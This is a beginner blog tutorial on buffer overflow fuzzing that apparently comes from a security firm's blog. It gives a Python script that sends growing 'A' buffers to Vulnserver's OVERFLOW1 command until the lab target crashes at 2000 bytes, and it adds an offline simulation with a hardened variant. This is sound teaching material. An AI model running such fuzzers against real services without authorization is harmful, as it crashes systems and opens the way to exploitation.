Buffer Overflow Beginner To Advanced, Part 2

Greetings everyone! Today we will learn how to perform fuzzing. In our previous blog we discussed the basic structure of a buffer overflow; in this blog we start with fuzzing, using a suitable example.

What is Fuzzing?

Fuzzing, as used here, is an automated script that continuously sends growing amounts of data (bytes) to the target application to check whether the application is vulnerable to a buffer overflow.

Vulnserver is listening on port number 9999.

Python Code For Fuzzing:

  #!/usr/bin/python
  import socket, time, sys

  ip = "172.16.0.10"
  port = 9999
  timeout = 5

  # Build a list of 30 payloads that grow by 100 bytes each round (100 .. 3000 bytes).
  buffer = []
  counter = 100
  while len(buffer) < 30:
      buffer.append("A" * counter)
      counter += 100

  for string in buffer:
      try:
          s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          s.settimeout(timeout)
          s.connect((ip, port))
          s.recv(1024)  # read the banner
          print("Fuzzing with %s bytes" % len(string))
          s.send(("OVERFLOW1 " + string + "\r\n").encode())
          s.recv(1024)  # wait for the reply; a timeout here means the service stopped responding
          s.close()
      except:
          # Any failure (refused connection or no reply within the timeout) ends the run
          print("Could not connect to " + ip + ":" + str(port))
          sys.exit(0)
      time.sleep(1)

When we run the script above, it starts sending packets continuously to vulnserver. Here we observe that the script stopped at 2000 bytes because vulnserver stopped responding.

Below I attached both screenshots: one of the script's output and the second of vulnserver's status.

FUZZING

In the other screenshot the application is paused, since our vulnerable software is running under Immunity Debugger.

From Immunity Debugger

In the example scenario above we discussed how fuzzing works and how we can validate the buffer size using a Python fuzzing script. In this fuzzing section we learned how to write the script and run it against the application to find a buffer overflow vulnerability.
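To make the crash-length search described above reproducible offline, here is an added example (not code from the original post): the same fuzz loop written as a function, run against a constructed stand-in for the service that stops answering once the OVERFLOW1 argument reaches 2000 bytes, beside a hardened variant that bounds the argument length so no payload crashes it. CRASH_THRESHOLD, the reply strings and max_arg are constructed assumptions, not vulnserver's real values.

```python
from typing import Callable, Optional

# Constructed: the length at which the page's vulnserver stopped answering.
CRASH_THRESHOLD = 2000
Sender = Callable[[bytes], Optional[bytes]]


def _parse(payload: bytes):
    command, _, arg = payload.rstrip(b"\r\n").partition(b" ")
    return command, arg


def simulated_target(payload: bytes) -> Optional[bytes]:
    """Constructed stand-in for the service: answers until the OVERFLOW1 argument
    reaches CRASH_THRESHOLD bytes, then returns None (a crashed process never replies)."""
    command, arg = _parse(payload)
    if command != b"OVERFLOW1":
        return b"UNKNOWN COMMAND\n"
    return None if len(arg) >= CRASH_THRESHOLD else b"OK\n"


def hardened_target(payload: bytes, max_arg: int = 1024) -> Optional[bytes]:
    """The same stand-in with the defender's fix: refuse arguments longer than the
    fixed-size buffer instead of copying them blindly, so no length crashes it."""
    command, arg = _parse(payload)
    if command != b"OVERFLOW1":
        return b"UNKNOWN COMMAND\n"
    return b"ARGUMENT TOO LONG\n" if len(arg) > max_arg else b"OK\n"


def find_crash_length(send: Sender, step: int = 100, max_len: int = 3000) -> Optional[int]:
    """The page's fuzz loop as a function: grow the argument by `step` bytes per round
    and return the first length that got no reply, or None if the target survived."""
    length = step
    while length <= max_len:
        if send(b"OVERFLOW1 " + b"A" * length + b"\r\n") is None:
            return length
        length += step
    return None


if __name__ == "__main__":
    print("simulated target crashed at:", find_crash_length(simulated_target))  # 2000
    print("hardened target crashed at:", find_crash_length(hardened_target))    # None
```

The `send` parameter takes any function with the same signature, so the socket code from the script above can be wrapped into one (returning None on a timeout) to drive a real listener the same way.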

Thanks for reading... See you in another blog!

Stick with our blog: https://securiumsolutions.com/blog/

Author : Shubham Jaiswal | WEB VAPT (Intern)
